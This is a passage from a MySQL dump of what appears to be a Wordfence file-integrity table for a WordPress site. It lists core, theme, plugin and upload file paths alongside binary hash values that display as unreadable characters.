b','LI�]֭Q���^��C�3�\Z�{��u���','',0,'?'),('���%�I3-�7�','wp-content/themes/twentynineteen/style-editor-customizer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ge�e�E\0-L{g��9','�z7��4��|X1����#��{/�Yio�(','',0,'?'),('��2���s��k��','wp-includes/blocks/categories/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���\'y���ª�','+��vy^dU���1vv�t����+$b�:�','',0,'?'),('�����oy�\\Y.6�','wp-content/plugins/disable-gutenberg/inc/plugin-frontend.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z\Z3w�|��;�:� L','���<|r���j��(��K^\\P��','',0,'?'),('���6B�b���M��','wp-content/plugins/wordpress-seo/inc/sitemaps/class-author-sitemap-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�(��X����)&','u�[�|8Y^�%\Za\r�9ĩ\')\'��e���','',0,'?'),('���%���\\(w����&','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I\0��$K�� � ','V�p\Z�1͌э�\'=~�ٲ�F_u\\��P�','',0,'?'),('��G^�2G��%�k���','wp-content/plugins/wp-cerber/assets/flags/fr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('�����:x�=�}�','wp-includes/js/jquery/ui/mouse.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J�;��ty����','�G������[&�~ͤ�E3� �z͟��ӱ�','',0,'?'),('���a�Z�?5��X�','wp-content/uploads/2016/11/home-300x169.jpg',0,' �nq�J \r�%@��<',' �nq�J \r�%@��<','փ�b��@��\n7d���{�]Pa���n�R֖','',0,'?'),('��C)�VxzϞ�ΩtP','wp-content/plugins/wp-cerber/assets/flags/um.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�xQos:h�\0A�qY','�?85�ϝ��r�o�e��[UԦM��\\','',0,'?'),('��H�a�+����̰I�','wp-content/plugins/wordfence/waf/bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^=��4�|��\'�\'�O','��w��=�M��q�a[����h<ǧ�\"�=��}�','',0,'?'),('��;�;/J�KmR��0�','wp-content/plugins/akismet/views/start.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�z�\"\'�\0�\0Y7^kTj','�=P���=�y�p��y�P���*u]����*','',0,'?'),('��O�I��Y�\\�{=�H','wp-includes/robots-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\��líܓM��','^�h��Ru�ɆCZ11��S���&̊p0','',0,'?'),('��y�&a�A�7�]Dm','wp-content/plugins/wordfence/images/icons/ajaxRed16.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%���B\ng�2��;','D,�A�J���lOS�p�e؇�&���','',0,'?'),('����m~fҾ��w�','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Argument/RewindableGenerator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DK�R��쟙�۹��6','�r��:\' \"��S�\05g�SƢ�\"��@Nwփ�','',0,'?'),('�ƞׅ\ZX�X]�Y�F','wp-includes/js/codemirror/htmlhint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�|џ�G�MtP5��','\0U[\0�M\'mCռ5��5k`����5�ё','',0,'?'),('� ϛ��3Rc��Ϲ','wp-content/plugins/redirection/fileio/csv.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I���U����[��7�','��:����ӝf��G\02��K�;����C�\'�','',0,'?'),('�PB�\n��Z�Y �P�','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-notice-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�M;�;���','���6��K�&nol&F���ax�3s&�E\'\n','',0,'?'),('�zQ���n���1j','wp-content/plugins/wordpress-seo/src/wrappers/wp-remote-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a=]��e����%�N���','B5؆�Tx|U�=䈕���=�^9Gf��rγ�U','',0,'?'),('� a\"KwT�bc1S','wp-admin/css/revisions.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǰW��{�jڛ/$��','��j ELCo�!;u��:�蛜|�|/���3eom','',0,'?'),('�+�,4~���.','wp-content/plugins/wordpress-seo/css/dist/icons-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�>N�:�� #�','��f�\r��h�nH\Z<��|-�BY/\0�m','',0,'?'),('�-�[ip��\\^���]','wp-includes/widgets/class-wp-widget-tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�q��th�̷L��','��s�F�f�<�5H��u�1�����8��mU','',0,'?'),('�0�&�Y�������','wp-content/plugins/wordfence/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('�2l�Ƴ;���-6�','wp-content/plugins/wp-cerber/modules/aaa-wp-cerber.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3W�T��\r�ط�18��','<�[�7�LĆ9�>gQ�:�56��bW�7��','',0,'?'),('�4g��e���>���ߝ','wp-admin/images/list-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hջIS�2��i�g�','��J�p�S_��X��#���UB�-z���,�','',0,'?'),('�;�f�J1��˘��+C','wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n\n��+ծ.jqAZ�','�\0��I������36���ěn�j7jk�:��','',0,'?'),('�OOwT�M\r��Y�!d','wp-includes/js/mediaelement/mediaelement.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-6�������m����','���%�]�cط�Z���7�\n�ԋ���2���','',0,'?'),('�V5e$�4��7���','wp-content/plugins/wordpress-seo/vendor/yoast/i18n-module/src/i18n-wordpressorg-v3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pұ�?�i��.5���B','��-��R��v�W�FP-i�i�@5�l5>��','',0,'?'),('�]ǿ|������IC�','wp-includes/js/dist/keycodes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�1/�-ly�{�2','!Ob��p�mT���ޯn�L�1�\Z���_�W�','',0,'?'),('�fkj��N�Uei4=%�','wp-admin/js/tags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���D�Xݲ�2Ug�','���9�k7qJ�3��B�l?W����؎��','',0,'?'),('�y%���Ǻ~�ne\"V','wp-admin/css/list-tables-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� u>0se#�hy�$��','��P��ુg_�\'*�Z0�Xp�2K70��[�','',0,'?'),('���GJA�N�^Lϗ','wp-content/plugins/wordpress-seo/css/dist/admin-global-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����b=�BP�\\','�\Z*��[��;��uQW��v��0�Т\r�kF�Ƒ','',0,'?'),('��\Zv\0��̀Fn8���','wp-content/plugins/wp-cerber/assets/flags/tm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�d&���&����/��','�p�DƱq��ߙcc����D�J�cT5@�U�v\n','',0,'?'),('�����s�x�ϧY� ^','wp-content/plugins/wordpress-seo/inc/health-check-default-tagline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\0�p,�;�$H','0��U�\0`��7�-�\\t��č=)���B\"/','',0,'?'),('��tb�|��{�q','wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hq��A����i�','��� q68�xօ�\\��s\rN�~�.��Zخ[\"','',0,'?'),('���/�-�Tǻ�T<�S','wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�NkyIk��wה�=i','LS=����Wf&�d\\=]_f�vesW���','',0,'?'),('��\'�*6�$�b/H���','wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-publisher-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-8�����{��H','2MX%U*�ٌ^���o\\� #.�@����kn�','',0,'?'),('���r���N(��M�\\','wp-includes/blocks/post-title/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4�̈~�3�vtSQ\'','�g�e��T����\'i\\��i��=>;�QBH\'D��','',0,'?'),('���ۖL�����.b','wp-content/plugins/wp-cerber/assets/icons/fonts/crb.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A`1�r�8{W�T7���',']���r���AۀBQ� ���NRy~2�M�/��','',0,'?'),('��w��B�b��kK','wp-content/plugins/wordpress-seo/languages/yoast-components-gl_ES.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sl{��U��h;','��Ī��d\rX$C/du�\\E��,��ς,K','',0,'?'),('�v�@�iϡ��9��\"�','wp-content/plugins/wordpress-seo/src/schema-templates/recipe.schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A|�H/8�Q�g�W','�Nc�fbr���\"`@�=����2`,�X��3c','',0,'?'),('�1�o%��q�A��','wp-admin/js/inline-edit-post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����1�/V`�n�BR�','�N�XL��1�YDr/�uXn���o���gd���','',0,'?'),('�TL �߈,]��զ�m�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8� �����:{��W��e','6{w���^Gk�Ϋ�25�b��\r���','',0,'?'),('�U�\\L�3�.lV�?t�','wp-content/plugins/wordpress-seo/src/helpers/home-url-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�ĄF�z�֍�','hTWNB��ZG����v�R�f�y\Z�e�A','',0,'?'),('�z�h9��ꈦ��Xp�+','wp-content/plugins/wordfence/views/scanner/no-issues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xt-|�F������e�','��_?7���c���:_��@���E�J��s��[','',0,'?'),('��9�n����P,��A��','wp-content/plugins/wp-cerber/assets/flags/pm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��\'�)v\rC��','`&�k$\nuxd�sh��RZ�\r��� (�Qf�','',0,'?'),('����v���V5ǃ�D�u','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڄ�\n�1�h;!�','�Mϡ� ����p�k��)����!\r��','',0,'?'),('��ҕտ���Jb8���.','wp-content/plugins/wordpress-seo/src/config/migrations/20200617122511_CreateSEOLinksTable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m���u��ɂ���','5ֱ\Z*�!#����~�$��}&\\�O���FQ�m','',0,'?'),('����L<�k7�+','wp-content/uploads/2016/11/wood-fibre-boards-2728937_960_720-768x512.jpg',0,'��k?�GY2�_\' $�','��k?�GY2�_\' $�','p$�Τ�5<�����(�\0��.�Y,�ķ�qO','',0,'?'),('���v�[�Dg��t9WF�','wp-content/uploads/2019/09/garden-waste-300x200.jpg',0,'QKXF�A�m^c�t�z��','QKXF�A�m^c�t�z��','/��\n�z�~�Z�O�؋Aޜ��l��F�ؤT','',0,'?'),('����|���xY�iF','wp-content/themes/twentytwentyone/assets/sass/06-components/footer-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ߔ>�j7\'\r\0��','���K\ns�DШ�D}�\0b�x:�XJ�HlN~��k','',0,'?'),('��E�S�c+��#�)','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�Nm�S���C��{�','���P~�{p��}x{�8�2�hX�x���','',0,'?'),('��F�����{��A','wp-content/plugins/wordfence/lib/sysinfo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{X�6��92����','G,��=����C\Z3���~f�(8��Ψ��@�,ї','',0,'?'),('����~�a�De��F�G','wp-content/plugins/wordpress-seo/admin/metabox/class-abstract-sectioned-metabox-tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#���J}<K��8\0����','��f�q�9҅��gfy)Ѐ_a�\"\"]��(Ʉl','',0,'?'),('��E���Q?�� (�','wp-includes/class-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j,;�\Z3�x���','��0�v�!�vv7�H�lV�d���i\'K�����','',0,'?'),('��Z/N�H@~a���?d�','wp-content/plugins/wordfence/css/wf-global.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ADmqc��v��d9','�(O��ӛˀԟMAW��D�0�\\��5LG�','',0,'?'),('�.݁B��xK�Y�','wp-includes/ms-default-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�����n����','W�a�h\n�\0�8u�v���yv,N�����!�wh','',0,'?'),('��6����~e�{�\".w','wp-includes/widgets/class-wp-widget-recent-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�d�9@z�{�����','���i�P�_4��� ����,�~]��h{�pC','',0,'?'),('��m5�m�r��','wp-content/themes/vega/assets/img/ico_arrow_ud_white.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A\\���3rg:�S^8o','�k 4S��^_�j�niC&����_��=2�','',0,'?'),('��W�/*V�Nk','wp-content/plugins/wordpress-seo/languages/yoast-components-pt_AO.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$��s㶎j��\08(86','���6Z���\Z�֚�~��ϔ�K��a','',0,'?'),('�*O-�Lτ���\r[�u','wp-admin/css/about-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<+᭚K���b��5�','���b�$,=~�+���-�\"�6�;�u)��|F:','',0,'?'),('�??n�����_2g��j','wp-includes/js/wp-util.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�Zl��.}L�{!aN)$','� k���d���Yn*��IӒ�_,��2\0��','',0,'?'),('�Yg�$z�H�.Y��','wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(��`W�6�$�','fDYr��tt��}}}1�q/u|�����;�B','',0,'?'),('�[C^�N6�R&�5�#H','wp-content/plugins/wordpress-seo/languages/yoast-components-fr_CA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>x\r�B����܊t\0��','� �@-خ���&�IW#YZ��0�{�fu(9\r','',0,'?'),('�_!�N6#\"�=uq�}','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/bs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bC�5��k����iU',']������Y�|�кc�.<��]�-����Su','',0,'?'),('�p�8W4�k�c>�8','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/AggregateException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݾ��2iI�\'��z�m','�h��qUtx�(�m8K퇗�\'�2haq�[�s','',0,'?'),('����m��ӟa����','wp-includes/blocks/post-featured-image/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�WW{���SR�ž7�',']c��rs��eD�$�$#8���0���(�','',0,'?'),('��`$Ϯ���O�\0i','wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n�В��o�a�\"��','l @> �8[w�t����?X扊�>��V}�','',0,'?'),('��E��e���Ar�и','wp-content/plugins/wordpress-seo/src/conditionals/yoast-admin-and-dashboard-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��n7ޗ��n','��D[�� 2�j7��\n\n�s����TI��x�','',0,'?'),('��\n��R�b��x���g','wp-includes/css/dist/block-library/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�C/��[�C�pmڠ�','���|ST�\Z����:9d�:�_s�|�=�AtlI','',0,'?'),('��V~�I�GC�� p�I','wp-content/plugins/wordpress-seo/js/dist/classic-editor-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zN�^i��e4Bq�R�','Ifar0O�\'I��ٯ:�%�@�H<��0','',0,'?'),('���K���\'�\Zxrx��','wp-content/themes/twentytwentyone/assets/sass/06-components/footer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y� ���,�W��\Z�^','Zv�MYWH��k��I=��\Z�Qj�E�ǟ�','',0,'?'),('��Y�\0)\r/j�)�Ar','wp-includes/customize/class-wp-customize-filter-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��`f��\0�iu�','�\0<\n�j:��Y�F���d�w�� ���','',0,'?'),('�c��Y JB�H���','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/LoggerAwareInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(Bߛ�H� �}0�','�������w���0����l�����?��','',0,'?'),('�؉�iIqt#]4','wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�<���3������','����3��Mx����#�0�63�#�a�u2�','',0,'?'),('�P�h`|/���:W�\0','wp-includes/blocks/columns/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y+ZGl#�l��@���','0q|AI��iY�p��!�\r��.ߔ�2)��~a���','',0,'?'),('��DT\'{�_̤ؤP7','wp-content/plugins/wp-cerber/assets/flags/gf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('�$n1��U\\�x(�','wp-includes/blocks/missing/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���GN]ܫx|�7�','<kt����b���ĸW��#��X��n��BL�','',0,'?'),('�!���\"�-;4-?','wp-content/plugins/redirection/locale/json/redirection-lv.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʚ����Z��8ZPO�','�P���� \"�{��\\TD\Zx��*�D�p�','',0,'?'),('�$_���X��la�','wp-includes/js/jquery/ui/sortable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�kX���E�EL�&�','F\0|\'��Lk8qp� �(����� v�}/5N![','',0,'?'),('�1�[�qs���o-O#�','wp-content/plugins/wordpress-seo/src/config/migrations/20200507054848_DeleteDuplicateIndexables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ic�\n���`NEBd�','U���\nu�UK��}\r�.�����[w\' SYΕ*','',0,'?'),('�? ��W$j�P+)���','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-pl_PL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CSȋ�I�',' D�\Z\0�^�[t�a�q���HҼ�}����?','',0,'?'),('�E���F��Q�-5�','wp-content/plugins/redirection/locale/redirection-ja.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���T���P��DJ�','ơ!pM���oپپ�@������ɱ�;6��̼','',0,'?'),('�R;lzO�8m<3�Nie','wp-admin/user/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`���U�� }��\n�','�οzB�+q���5Vl�K�l��k���Z/��|','',0,'?'),('�afh=F���T�:��6�','wp-admin/includes/class-ftp-sockets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�\"P����e<��3i','.\Z�D��-����ày!�����̕l��','',0,'?'),('�ik[!gW��}�v�ȵ','wp-includes/blocks/image/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�����~�����\\BJ�',';C���xe�0\Z\'��a�S�9�_\Z� Wn���','',0,'?'),('�l��Yr�f�ȁf}�Ʊ','wp-content/uploads/2016/11/taupe-kitchen-cabinets-contemporary-with-range-in-island-wine-and-bottle-openers.jpg',0,'h��\'�����F0','h��\'�����F0','h_;�sp��q����ZG�:e�~�$nÐO d','',0,'?'),('�~\"���1��[Z=�','wp-content/uploads/2019/12/pexels-photo-2098443-150x150.jpeg',0,'�Ā]��k�����','�Ā]��k�����','��Q�=�[�A�3Q�.�g��uĽ�y�','',0,'?'),('�����;~ӷR�>��','wp-includes/class.wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�zrU[\nK��z��','s�d����� J�WL�+<�I���S4y$)T@','',0,'?'),('���nvp�e������}�','wp-admin/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�a�-�����G4%�','\\�>\\�=�,�8i=V��1\0)J8\njh~! �','',0,'?'),('��&���#\Z�y��','wp-content/plugins/wordpress-seo/src/integrations/cleanup-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_j�~v�>��B��<ð','}@��xb�d��)� ����w�','',0,'?'),('���D�Tǡ�#\"�1?�','wp-includes/blocks/cover/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�زxZ��j���ޅ�','��е�gdwI�Ŕ\nS22:x��oA��? eG','',0,'?'),('��P���Z2�7�Mn��','wp-includes/blocks/rss/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{]ө��Z>�ﭒ��','d�Z�3��a�Hّ�2�\'t���\0L�\\[��i!Q','',0,'?'),('��ucZ��o��s�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-comment-spammer-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�p��=r���8ʗ�','�\\��Z���`\\@��*�Ǘ�o3B�&j\0','',0,'?'),('���*��h^������','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n<Tfw��Y�_I���','e��\'#�\\�?����O-�U�L�]5�6��$','',0,'?'),('�� �\\���
�Tn��]','wp-includes/Requests/IDNAEncoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�G���}n(�Y��','/��<�E��=C��$�x��BHx��J�`Jw','',0,'?'),('���B\\u}�L�,���','wp-includes/css/dist/block-directory/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���X!�S���\\��h','!m�*�\r/�.��t�\r��n��$*|G�mn��Fr2','',0,'?'),('���:�[�f��KZ�?�','wp-content/themes/twentytwentyone/assets/sass/06-components/comments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]�N���.���,','r�ŃM\n�.�H���D�3w�m�yb���','',0,'?'),('���(_�J�D~���','wp-content/themes/twentynineteen/inc/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@\\�H�-�m�\nѲ\n','.�(l)�p8�R��c��6p��,���L�X','',0,'?'),('��\Z���3�H�{�Dz�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r� ���Ϭ�n+�n','^�q�N����Т��&yN�~�\'S//>}�p','',0,'?'),('�$BWm8��R�m�','wp-content/plugins/wordpress-seo/languages/wordpress-seo-he_IL.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�J�ѥ���^��','<�F�J̺Բl@��%�k/@;�,�u(5���D','',0,'?'),('�#:���Sk�U���{�','wp-content/plugins/wordfence/modules/login-security/classes/model/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�:�?��l]�����u','2P��탚��=w=��7Ar�\n�fQ��~,��B','',0,'?'),('�(�|n��sARF�+','wp-includes/js/crop/marqueeHoriz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̮����;���Lo\n','|���S�e��|.���/�Q�Y��W�}(','',0,'?'),('�7��LYs��T�a�h9','wp-content/languages/plugins/wordpress-seo-en_GB-03f335bdad23d21a49c36385e2db1556.json',0,'8X�������.�YY�','8X�������.�YY�','ɏ�#�F�Ƅ��c�,��\n��띱�L�Z���','',0,'?'),('�[\'�/���;���','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yP58��Ƣ����','��z3qS���T=�䞌HL<Y5A��#H','',0,'?'),('�c:Qk2� �6��','wp-includes/blocks/columns/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�PЊkA���Eð.��','z㱵@����@%���쐢��Q��S�','',0,'?'),('��>��$\'��i�','wp-content/plugins/redirection/locale/redirection-en_NZ.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\Ԫ`�>�W�l��B\0�',';�k\"���\"WXy���V0 RN�;�a0�w���x�','',0,'?'),('�����:[&b�[�hY��','wp-includes/images/smilies/icon_razz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9[�w���D�AM�A�',';���P�1]f�UE��;`Qڮ�\ne�Z\0@4�aA�','',0,'?'),('����L�7HnWE�DM�','wp-content/plugins/wp-cerber/assets/flags/sj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4� \Z���rM�','',0,'?'),('���x2�_.�~$�)','wp-includes/js/dist/core-data.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z�f�0�Y�W��','o}��](� �+���\Z��A���3�S�4�h�s','',0,'?'),('��8Q����f���','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-website.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�#�B8�K��','8~��#��\r���hlӲ���\r��/�>]t��u','',0,'?'),('��$�tզ}� �T','wp-includes/blocks/code/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����(�궲zhɶ',' ���6�r3����C9a�ْ�~ȝ���:�','',0,'?'),('�Ὀ����5f?�hk','wp-includes/widgets/class-wp-widget-media-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�P��/:���#�A','��P����!jz�F#�����d�ĚMP','',0,'?'),('����8`9��?Bb�Б','wp-includes/js/jquery/ui/effect-puff.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��5�����t�','`}��`�J)�$;��+�6K�C1R�&]C�i��','',0,'?'),('�5�p\rm�k������','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-sv_SE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iQ�Cs�����ƅ�A','�j1w�%#m��˕��$���:/g�^Mh���','',0,'?'),('�\n��� ��/Y','wp-includes/js/dist/data-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�ϩV\0e�ռ�L�','T~�ź��?��f!LJlOU��2�t�W��','',0,'?'),('�5D�+���_�mYN','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-lt_LT.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����#����i��','�%� �b���znh\\�����2���s~�','',0,'?'),('�+F�4�\n��q���\"]','wp-includes/blocks/table/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|�>��¾7�t�U','U�PS!�� \\��z\Z��Lruw�U�������','',0,'?'),('�2�v�\'����{�1\0��','wp-content/plugins/wordpress-seo/src/integrations/admin/background-indexing-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����yݽ�I�Rӄ��','����t��7�eeov\r݇ڇ���:����\\z','',0,'?'),('�D��?ļ�\n����','wp-content/plugins/wp-cerber/assets/flags/ml.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��hϸ-�1�՞��3','�A\0�]�ҕ#�:\r40�2��W�A%��)V\n','',0,'?'),('�SF���b��+N�Ѕ 